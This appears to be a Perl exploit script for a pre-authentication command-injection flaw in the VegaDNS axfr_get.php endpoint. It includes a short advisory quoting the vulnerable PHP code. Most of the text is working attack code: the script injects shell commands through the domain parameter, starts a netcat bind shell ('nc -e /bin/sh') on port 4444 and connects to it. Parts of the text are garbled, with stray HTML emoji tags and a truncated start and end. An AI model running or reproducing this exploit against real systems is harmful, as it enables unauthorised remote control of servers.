#!/usr/bin/perl
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by @Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# ← · ↑ · → · ↓ · <img src="https://s.w.org/images/core/emoji/2/svg/2196.svg" alt="↖" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2197.svg" alt="↗" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2198.svg" alt="↘" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2199.svg" alt="↙" class="emoji" draggable="false">
print " ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;